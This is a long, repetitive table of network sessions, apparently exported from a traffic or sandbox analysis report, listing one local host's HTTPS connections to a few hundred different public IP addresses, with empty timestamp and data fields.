                              11071192.168.2.1356976180.205.240.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11072192.168.2.1345478186.228.164.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11073192.168.2.134349879.81.156.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11074192.168.2.1353520192.104.131.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11075192.168.2.1353664111.29.157.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11076192.168.2.1355282211.81.76.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11077192.168.2.133356275.247.93.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11078192.168.2.134931277.73.31.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11079192.168.2.135515852.115.189.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11080192.168.2.133563469.118.78.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11081192.168.2.134830219.226.10.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11082192.168.2.1341956122.41.243.229443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11083192.168.2.135047840.53.129.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11084192.168.2.1339186165.232.160.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11085192.168.2.1356300174.39.107.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11086192.168.2.1346854189.16.253.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11087192.168.2.1360582124.12.179.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11088192.168.2.1342278197.93.0.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11089192.168.2.1333034113.241.94.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11090192.168.2.136021449.252.70.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11091192.168.2.135221661.73.37.91443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11092192.168.2.1336420188.234.42.32443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11093192.168.2.133319269.186.41.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11094192.168.2.1333052196.116.4.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11095192.168.2.135938043.236.91.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11096192.168.2.134647661.46.83.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11097192.168.2.1344704138.121.228.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11098192.168.2.1355824161.236.196.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11099192.168.2.133517070.85.198.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11100192.168.2.133915063.74.171.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11101192.168.2.135393282.171.140.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11102192.168.2.134176270.60.6.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11103192.168.2.133324273.167.66.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11104192.168.2.1359788211.89.0.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11105192.168.2.133333245.17.220.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11106192.168.2.1338206159.188.188.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11107192.168.2.1356684195.172.130.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11108192.168.2.134495694.23.122.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11109192.168.2.13591464.19.130.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11110192.168.2.133792653.196.198.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11111192.168.2.133885017.186.53.173443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11112192.168.2.133906463.255.174.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11113192.168.2.1347878133.227.112.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11114192.168.2.1350612140.160.92.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11115192.168.2.135589252.48.215.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11116192.168.2.1334410159.74.250.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11117192.168.2.135785082.162.175.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11118192.168.2.1337038100.35.77.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11119192.168.2.1347148156.26.122.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11120192.168.2.1334628161.188.58.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11121192.168.2.1360024205.56.187.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11122192.168.2.1339478139.222.106.238443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11123192.168.2.1356998177.254.103.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11124192.168.2.1357164193.113.240.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11125192.168.2.1346978128.17.173.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11126192.168.2.134394844.86.201.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11127192.168.2.1336712210.225.199.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11128192.168.2.1332846105.44.32.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11129192.168.2.1338930141.184.70.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11130192.168.2.1357288111.147.99.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11131192.168.2.1338888180.1.50.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11132192.168.2.1360862163.179.243.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11133192.168.2.135677694.225.144.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11134192.168.2.135268438.7.233.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11135192.168.2.1342522153.100.255.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11136192.168.2.1347716182.58.245.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11137192.168.2.1343662117.212.137.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11138192.168.2.1360986125.189.167.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11139192.168.2.133400094.59.11.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11140192.168.2.133682836.187.201.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11141192.168.2.13520848.29.147.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11142192.168.2.1340164140.103.107.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11143192.168.2.1351442152.15.224.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11144192.168.2.1343056174.60.243.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11145192.168.2.1352846109.25.195.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11146192.168.2.1358030117.193.111.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11147192.168.2.134399467.70.200.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11148192.168.2.1356390107.33.115.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11149192.168.2.135579213.86.20.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11150192.168.2.1352100188.17.63.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11151192.168.2.1334840114.110.255.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11152192.168.2.134803420.251.255.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11153192.168.2.1332900106.42.43.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11154192.168.2.135279088.151.218.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11155192.168.2.1359380202.167.252.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11156192.168.2.1336050180.91.218.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11157192.168.2.134555851.170.213.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11158192.168.2.1345004136.24.227.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11159192.168.2.1351826177.144.80.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11160192.168.2.133944819.69.66.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11161192.168.2.1359262135.95.159.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11162192.168.2.1349506217.110.79.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11163192.168.2.135910235.63.239.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11164192.168.2.1339584145.61.82.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11165192.168.2.1346546200.224.31.137443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11166192.168.2.1341058150.80.232.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11167192.168.2.1335786144.208.168.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11168192.168.2.133277238.135.214.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11169192.168.2.1346430144.35.77.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11170192.168.2.135243672.52.229.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11171192.168.2.1343150190.86.41.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11172192.168.2.13596104.63.144.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11173192.168.2.134360451.148.78.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11174192.168.2.135506063.57.46.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11175192.168.2.135534853.81.231.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11176192.168.2.136011292.205.217.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11177192.168.2.135342262.189.181.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11178192.168.2.1356514194.105.16.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11179192.168.2.136050091.220.237.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11180192.168.2.134932290.154.98.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11181192.168.2.1344214107.105.169.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11182192.168.2.1352584173.36.102.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11183192.168.2.133993418.164.243.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11184192.168.2.1356924153.135.219.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11185192.168.2.1351756160.103.71.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11186192.168.2.1342696114.51.196.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11187192.168.2.1359224146.60.31.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11188192.168.2.1342030212.40.117.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11189192.168.2.135281046.98.21.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11190192.168.2.1333106141.136.184.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11191192.168.2.1342780126.104.171.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11192192.168.2.135373473.117.38.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11193192.168.2.1344324212.108.105.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11194192.168.2.133392631.46.77.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11195192.168.2.135941447.151.36.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11196192.168.2.135222432.227.229.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11197192.168.2.1334062194.138.250.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11198192.168.2.1347714140.246.82.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11199192.168.2.135200680.66.248.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11200192.168.2.1359830111.88.59.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11201192.168.2.1339964125.129.225.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11202192.168.2.1335724185.40.110.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11203192.168.2.1354722196.234.227.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11204192.168.2.1345796123.244.53.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11205192.168.2.1359176117.108.212.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11206192.168.2.1347428183.169.60.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11207192.168.2.135451017.181.22.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11208192.168.2.135624853.11.84.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11209192.168.2.13565665.188.58.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11210192.168.2.1335526172.98.46.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11211192.168.2.1355286194.62.137.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11212192.168.2.133594298.240.152.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11213192.168.2.1343550196.94.239.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11214192.168.2.1354968132.184.187.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11215192.168.2.133905647.164.43.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11216192.168.2.1357658100.37.18.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11217192.168.2.1348910205.11.87.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11218192.168.2.135032672.184.121.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11219192.168.2.1339418195.18.88.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11220192.168.2.133573054.249.95.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11221192.168.2.1333508104.103.145.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11222192.168.2.1338598149.105.127.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11223192.168.2.1346232181.88.43.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11224192.168.2.136032270.247.237.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11225192.168.2.1334694192.254.80.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11226192.168.2.1350112104.14.5.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11227192.168.2.133460683.38.153.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11228192.168.2.1335314206.160.203.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11229192.168.2.134364297.97.16.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11230192.168.2.1357062219.73.155.201443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11231192.168.2.135805254.226.154.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11232192.168.2.1347254149.27.176.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11233192.168.2.135713431.71.239.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11234192.168.2.1341678203.25.117.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11235192.168.2.134041250.120.70.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11236192.168.2.1355628122.237.243.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11237192.168.2.1358982132.130.230.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11238192.168.2.1341538218.75.26.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11239192.168.2.1338038170.180.16.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11240192.168.2.1340356125.129.102.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11241192.168.2.1347822177.41.17.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11242192.168.2.1357544176.145.81.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11243192.168.2.136084283.51.47.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11244192.168.2.1334108201.41.85.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11245192.168.2.1348724186.47.154.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11246192.168.2.1359260109.115.188.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11247192.168.2.136042051.179.165.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11248192.168.2.1351832203.198.150.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11249192.168.2.1346562155.245.175.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11250192.168.2.134995240.167.193.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11251192.168.2.134157623.240.106.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11252192.168.2.133738847.70.98.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11253192.168.2.1345346208.148.142.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11254192.168.2.1352462168.3.212.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11255192.168.2.1359166140.114.166.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11256192.168.2.135652685.225.47.129443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11257192.168.2.133849087.245.23.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11258192.168.2.133481088.16.30.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11259192.168.2.1343146119.29.238.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11260192.168.2.135654889.215.72.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11261192.168.2.133986220.126.85.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11262192.168.2.133925068.36.188.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11263192.168.2.1357996177.10.18.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11264192.168.2.1333186208.242.144.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11265192.168.2.135692491.227.207.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11266192.168.2.134396223.170.166.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11267192.168.2.134608080.241.127.27443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11268192.168.2.1339746159.179.191.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11269192.168.2.1344788108.175.10.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11270192.168.2.135057677.95.184.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11271192.168.2.134423488.182.120.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11272192.168.2.133308617.155.141.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11273192.168.2.1345870208.228.40.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11274192.168.2.134495868.207.130.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11275192.168.2.136093875.71.156.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11276192.168.2.134850819.50.233.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11277192.168.2.1359518125.12.120.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11278192.168.2.135188647.129.171.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11279192.168.2.135270289.121.177.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11280192.168.2.135165695.3.108.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11281192.168.2.135939287.208.233.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11282192.168.2.1338764135.151.213.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11283192.168.2.134017876.147.40.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11284192.168.2.1355656173.33.200.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11285192.168.2.1345770181.150.31.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11286192.168.2.135233490.246.56.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11287192.168.2.1336984104.154.42.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11288192.168.2.1335082157.72.180.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11289192.168.2.134420653.185.65.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11290192.168.2.1354652219.203.106.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11291192.168.2.135438892.237.38.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11292192.168.2.135380023.206.37.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11293192.168.2.134131067.162.23.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11294192.168.2.133953836.25.144.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11295192.168.2.135268812.85.23.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11296192.168.2.135296099.138.7.236443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11297192.168.2.135531823.132.209.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11298192.168.2.134240819.191.128.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11299192.168.2.1333566107.137.192.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11300192.168.2.133344884.7.254.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11301192.168.2.1346734206.196.164.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11302192.168.2.1357650191.60.191.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11303192.168.2.1336536216.53.198.139443
